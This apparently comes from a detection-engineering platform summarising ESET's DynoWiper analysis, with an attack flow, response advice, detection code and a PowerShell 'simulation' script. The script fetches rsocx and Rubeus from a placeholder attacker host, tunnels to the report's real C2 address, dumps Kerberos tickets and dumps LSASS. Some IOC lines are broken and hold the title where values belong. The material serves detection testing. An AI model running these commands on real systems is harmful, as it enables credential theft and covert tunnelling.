ESET Research DynoWiper update: Technical analysis and attribution
Summary
DynoWiper is a destructive wiper used against an energy-sector organization in Poland, affecting multiple endpoints. The executables were staged on a shared network location and launched directly from that share. ESET attributes the activity to Sandworm with medium confidence. Once executed, the malware overwrites targeted files with random bytes and then forces a reboot to complete the impact.
Investigation
ESET recovered three samples—schtask.exe, schtask2.exe, and _update.exe—dropped under C:\inetpub\pub. Embedded PDB paths suggest the binaries were compiled in a Vagrant environment. Reverse engineering showed a three-step wiping routine, with two variants inserting a five-second sleep between phases. Post-compromise artifacts also included the Kerberos tool Rubeus and an rsocx SOCKS5 proxy inside the victim network.
Mitigation
ESET PROTECT on the victim systems blocked all three variants, limiting damage. Reduce exposure by preventing unauthorized scheduled-task creation and monitoring for unexpected writes into shared directories. Add application allow-listing and disallow execution from network shares wherever possible.
Response
Identify and isolate hosts that run schtask.exe, schtask2.exe, or *_update.exe from a share. Preserve volatile evidence, review scheduled tasks and PowerShell deployment traces, and remove tools such as Rubeus and rsocx. Complete full forensics and restore data from verified clean backups.
Attack Flow
graph TB
    %% Class definitions
    classDef technique fill:#ffcc99
    classDef tool fill:#c2f0c2
    classDef action fill:#99ccff
    classDef malware fill:#ffd699

    %% Nodes
    action_ingress["<b>Action</b> – <b>T1105 Ingress Tool Transfer</b><br/><b>Description</b>: Downloaded additional tools such as Rubeus.exe and rsocx into the compromised environment."]
    class action_ingress technique
    tool_rubeus["<b>Tool</b> – <b>Name</b>: Rubeus.exe<br/><b>Description</b>: Performs Kerberos credential theft and abuse."]
    class tool_rubeus tool
    tool_rsocx["<b>Tool</b> – <b>Name</b>: rsocx<br/><b>Description</b>: SOCKS5 proxy used to relay C2 traffic."]
    class tool_rsocx tool
    action_cred_dump["<b>Action</b> – <b>T1003.001 LSASS Memory</b><br/><b>Description</b>: Dumped LSASS process memory via Task Manager to obtain credentials."]
    class action_cred_dump technique
    action_powershell["<b>Action</b> – <b>T1059.001 PowerShell</b><br/><b>Description</b>: Executed PowerShell scripts to deploy malicious binaries and facilitate further actions."]
    class action_powershell technique
    action_cmd["<b>Action</b> – <b>T1059.003 Windows Command Shell</b><br/><b>Description</b>: Used cmd.exe to run shell commands and orchestrate the wiper."]
    class action_cmd technique
    action_gpo_discovery["<b>Action</b> – <b>T1615 Group Policy Discovery</b><br/><b>Description</b>: Identified Group Policy Objects to prepare for wide-scale deployment."]
    class action_gpo_discovery technique
    action_gpo_modify["<b>Action</b> – <b>T1484 Domain or Tenant Policy Modification</b><br/><b>Description</b>: Modified GPOs to distribute the DynoWiper binary across the domain."]
    class action_gpo_modify technique
    action_schtask["<b>Action</b> – <b>T1053 Scheduled Task/Job</b><br/><b>Description</b>: Created scheduled tasks with schtask.exe to persist wiper execution."]
    class action_schtask technique
    action_data_removable["<b>Action</b> – <b>T1025 Data from Removable Media</b><br/><b>Description</b>: Placed tools and the wiper in a shared network directory C:\inetpub\pub\."]
    class action_data_removable technique
    action_file_discovery["<b>Action</b> – <b>T1083 File and Directory Discovery</b><br/><b>Description</b>: Enumerated files and directories on fixed and removable drives while excluding system folders."]
    class action_file_discovery technique
    action_wipe["<b>Action</b> – <b>T1561.001 Disk Content Wipe</b><br/><b>Description</b>: Overwrote file contents with random data, deleting or corrupting data."]
    class action_wipe technique
    action_reboot["<b>Action</b> – <b>T1529 System Shutdown/Reboot</b><br/><b>Description</b>: Forced system reboot after wiping to finalize destruction."]
    class action_reboot technique
    action_proxy["<b>Action</b> – <b>T1090.002 External Proxy</b><br/><b>Description</b>: Configured rsocx to use external SOCKS5 proxy 31.172.71.5:8008 to hide C2 traffic."]
    class action_proxy technique
    malware_dyno["<b>Malware</b> – <b>Name</b>: DynoWiper<br/><b>Description</b>: Wiper payload that overwrites data and triggers reboot."]
    class malware_dyno malware

    %% Connections
    action_ingress -->|downloads| tool_rubeus
    action_ingress -->|downloads| tool_rsocx
    tool_rubeus -->|enables| action_cred_dump
    tool_rsocx -->|provides| action_proxy
    action_cred_dump -->|provides credentials for| action_powershell
    action_powershell -->|executes| action_cmd
    action_cmd -->|orchestrates| action_wipe
    action_gpo_discovery -->|leads to| action_gpo_modify
    action_gpo_modify -->|distributes| malware_dyno
    action_schtask -->|creates task for| malware_dyno
    action_data_removable -->|stores| tool_rubeus
    action_data_removable -->|stores| tool_rsocx
    action_data_removable -->|stores| malware_dyno
    malware_dyno -->|performs| action_file_discovery
    malware_dyno -->|performs| action_wipe
    action_wipe -->|triggers| action_reboot
    action_proxy -->|relays traffic for| malware_dyno
Detections
Potential Malware Self-Removal or Stderr Concealment Operation (via cmdline)
Shutdown Used For Forcing a System Halt or Reboot (via cmdline)
IOCs (HashSha1) to detect: ESET Research DynoWiper update: Technical analysis and attribution
IOCs (SourceIP) to detect: ESET Research DynoWiper update: Technical analysis and attribution
IOCs (DestinationIP) to detect: ESET Research DynoWiper update: Technical analysis and attribution
Detection of DynoWiper Deployment via Scheduled Task Execution [Windows File Event]
Detection of Malicious Tools and LSASS Memory Dumping [Windows Process Creation]
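To make the Response section's isolation criterion and the detections listed above concrete, the following is an added example (not ESET's code and not the platform's own rule content) that runs simplified versions of those checks over constructed Sysmon-style events: one of the named samples (schtask.exe, schtask2.exe, *_update.exe) executing from a UNC path or from C:\inetpub\pub, any other execution from a network share, a forced shutdown /r or /s with /f, a file write into the staging directory, and a process outside an allow-list opening lsass.exe with PROCESS_VM_READ in its granted access. The event dictionary shape, the host names, the sample events and the LSASS reader allow-list are assumptions made for the example.

```python
"""Simplified DynoWiper detections run over constructed Sysmon-style events (added example)."""
import fnmatch

WIPER_NAMES = ("schtask.exe", "schtask2.exe", "*_update.exe")  # sample names from the report
STAGING_DIR = "c:\\inetpub\\pub\\"                             # staging directory from the report

# Sysmon Event ID 10 GrantedAccess bits (winnt.h values).
PROCESS_VM_READ = 0x0010
PROCESS_QUERY_INFORMATION = 0x0400
PROCESS_QUERY_LIMITED_INFORMATION = 0x1000

# Assumed allow-list of processes expected to open LSASS on a healthy host; tune per environment.
LSASS_READERS_OK = {"msmpeng.exe", "csrss.exe", "wininit.exe"}


def basename(path):
    """Lower-cased file-name component of a Windows path or bare command."""
    return path.replace("/", "\\").rstrip("\\").rsplit("\\", 1)[-1].lower()


def is_share_path(path):
    """UNC path (\\\\server\\share\\...) means the image was launched straight from a network share."""
    return path.startswith("\\\\")


def is_wiper_name(path):
    return any(fnmatch.fnmatch(basename(path), pattern) for pattern in WIPER_NAMES)


def in_staging_dir(path):
    return path.lower().startswith(STAGING_DIR)


def is_forced_reboot(cmdline):
    """shutdown /r or /s combined with /f: the forced reboot that completes the wipe."""
    args = cmdline.lower().split()
    if not args or basename(args[0]) not in ("shutdown", "shutdown.exe"):
        return False
    return "/f" in args and ("/r" in args or "/s" in args)


def reads_lsass_memory(access):
    """GrantedAccess containing PROCESS_VM_READ is enough to copy credential material out of LSASS;
    test the bit rather than an exact mask, since tools request different combinations."""
    return bool(access & PROCESS_VM_READ)


def analyze(events):
    """Return (host, rule, detail) tuples for every event matching one of the checks."""
    alerts = []
    for ev in events:
        host = ev["host"]
        if ev["type"] == "process_create":
            image, cmdline = ev["image"], ev.get("cmdline", "")
            if is_wiper_name(image) and (is_share_path(image) or in_staging_dir(image)):
                alerts.append((host, "wiper_staged_execution", image))
            elif is_share_path(image):
                alerts.append((host, "execution_from_network_share", image))
            if is_forced_reboot(cmdline):
                alerts.append((host, "forced_reboot", cmdline))
        elif ev["type"] == "process_access":
            source = basename(ev["source"])
            if (basename(ev["target"]) == "lsass.exe" and reads_lsass_memory(ev["access"])
                    and source not in LSASS_READERS_OK):
                alerts.append((host, "lsass_memory_read", f"{source} 0x{ev['access']:x}"))
        elif ev["type"] == "file_create":
            if in_staging_dir(ev["path"]):
                alerts.append((host, "write_to_staging_share", ev["path"]))
    return alerts


def hosts_to_isolate(events):
    """Hosts where a wiper-named sample ran from a share or the staging directory."""
    return sorted({host for host, rule, _ in analyze(events) if rule == "wiper_staged_execution"})


# Constructed sample telemetry for the example; not taken from the ESET report.
SAMPLE_EVENTS = [
    {"host": "WS01", "type": "file_create", "path": r"C:\inetpub\pub\schtask2.exe"},
    {"host": "WS01", "type": "process_create", "image": r"\\FILESRV\pub\schtask.exe", "cmdline": "schtask.exe"},
    {"host": "WS02", "type": "process_create", "image": r"C:\inetpub\pub\_update.exe", "cmdline": "_update.exe"},
    {"host": "WS02", "type": "process_create", "image": r"C:\Windows\System32\shutdown.exe",
     "cmdline": "shutdown /r /f /t 0"},
    {"host": "WS03", "type": "process_access", "source": r"C:\Windows\System32\Taskmgr.exe",
     "target": r"C:\Windows\System32\lsass.exe", "access": 0x1010},
    {"host": "WS03", "type": "process_access", "source": r"C:\ProgramData\Microsoft\Windows Defender\Platform\MsMpEng.exe",
     "target": r"C:\Windows\System32\lsass.exe", "access": 0x1010},
    {"host": "WS04", "type": "process_create", "image": r"C:\Program Files\App\app.exe", "cmdline": "app.exe"},
]

if __name__ == "__main__":
    for alert in analyze(SAMPLE_EVENTS):
        print(alert)
    print("isolate:", hosts_to_isolate(SAMPLE_EVENTS))
```

On the sample events this yields five alerts (a staging-directory write and a share execution on WS01, a staging-directory execution and a forced reboot on WS02, and a Task Manager read of LSASS on WS03) and recommends isolating WS01 and WS02; the Defender engine's LSASS access is suppressed by the allow-list, which is the kind of tuning a real rule needs to avoid paging on every AV scan.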
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the execution of the adversary technique (TTP) designed to trigger the detection rules. The commands and narrative reflect the TTPs identified above and aim to generate the telemetry the detection logic expects; abstract or unrelated examples would lead to misdiagnosis.
Attack Narrative & Commands:
- Establish a reverse SOCKS5 proxy using rsocx.exe. The adversary downloads the binary from an external server, places it in %TEMP%, and runs it with the -r 31.172.71.5:8008 argument to create a reverse tunnel back to the C2 host.
- Perform Kerberos ticket abuse with rubeus.exe. The tool is executed to request a Kerberos ticket-granting ticket (TGT) for the domain admin account and then obtain a service ticket through S4U2self. The regression script uses Rubeus's dump command instead; the process-creation detection keys on the execution of rubeus.exe itself.
- Dump LSASS memory using procdump.exe (a common alternative to Task Manager) to capture credential material. Sysmon records a Process Access event (Event ID 10) in which the attacker's procdump.exe process opens lsass.exe. A GrantedAccess of 0x1010 decodes to PROCESS_VM_READ (0x0010) | PROCESS_QUERY_LIMITED_INFORMATION (0x1000); PROCESS_QUERY_INFORMATION is 0x0400 and is not part of that mask. Tooling may request broader masks (for example 0x1FFFFF, PROCESS_ALL_ACCESS), so detection logic should test for the PROCESS_VM_READ bit rather than an exact value.
Regression Test Script:
# -------------------------------------------------------------
# Simulation script – triggers the Sigma rule for rsocx, rubeus,
# and LSASS dump. Run with administrative privileges.
# malicious.example.com is a placeholder for the lab server that
# stages the tool binaries.
# -------------------------------------------------------------

# 1. Deploy rsocx.exe (reverse SOCKS5 proxy)
$rsocxPath = "$env:TEMP\rsocx.exe"
Invoke-WebRequest -Uri "http://malicious.example.com/rsocx.exe" -OutFile $rsocxPath
Start-Process -FilePath $rsocxPath -ArgumentList "-r 31.172.71.5:8008" -WindowStyle Hidden

# 2. Deploy rubeus.exe (Kerberos abuse)
$rubeusPath = "$env:TEMP\rubeus.exe"
Invoke-WebRequest -Uri "http://malicious.example.com/rubeus.exe" -OutFile $rubeusPath
Start-Process -FilePath $rubeusPath -ArgumentList "dump /service:krbtgt" -WindowStyle Hidden

# 3. Dump LSASS using procdump (requires Sysinternals); the archive is
#    extracted into its own folder so the cleanup script can remove it
$procdumpDir  = "$env:TEMP\procdump"
$procdumpPath = "$env:TEMP\procdump.exe"
Invoke-WebRequest -Uri "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip"
Expand-Archive -Path "$env:TEMP\Procdump.zip" -DestinationPath $procdumpDir -Force
$procdumpExe = Get-ChildItem $procdumpDir -Recurse -Filter "procdump.exe" | Select-Object -First 1
if ($procdumpExe) {
    Copy-Item $procdumpExe.FullName $procdumpPath -Force
    # -accepteula suppresses the interactive licence prompt; -ma writes a full memory dump
    Start-Process -FilePath $procdumpPath -ArgumentList "-accepteula -ma lsass.exe $env:TEMP\lsass.dmp" -Wait
}

Write-Host "Simulation completed. Check SIEM for alerts."
Cleanup Commands:
# Terminate any lingering simulation processes
Get-Process -Name "rsocx","rubeus","procdump" -ErrorAction SilentlyContinue | Stop-Process -Force

# Remove binaries and dump files
Remove-Item -Path "$env:TEMP\rsocx.exe","$env:TEMP\rubeus.exe","$env:TEMP\procdump.exe","$env:TEMP\lsass.dmp" -Force -ErrorAction SilentlyContinue

# Remove the downloaded archive and the extraction folder
Remove-Item -Path "$env:TEMP\Procdump.zip","$env:TEMP\procdump" -Recurse -Force -ErrorAction SilentlyContinue

Write-Host "Cleanup finished."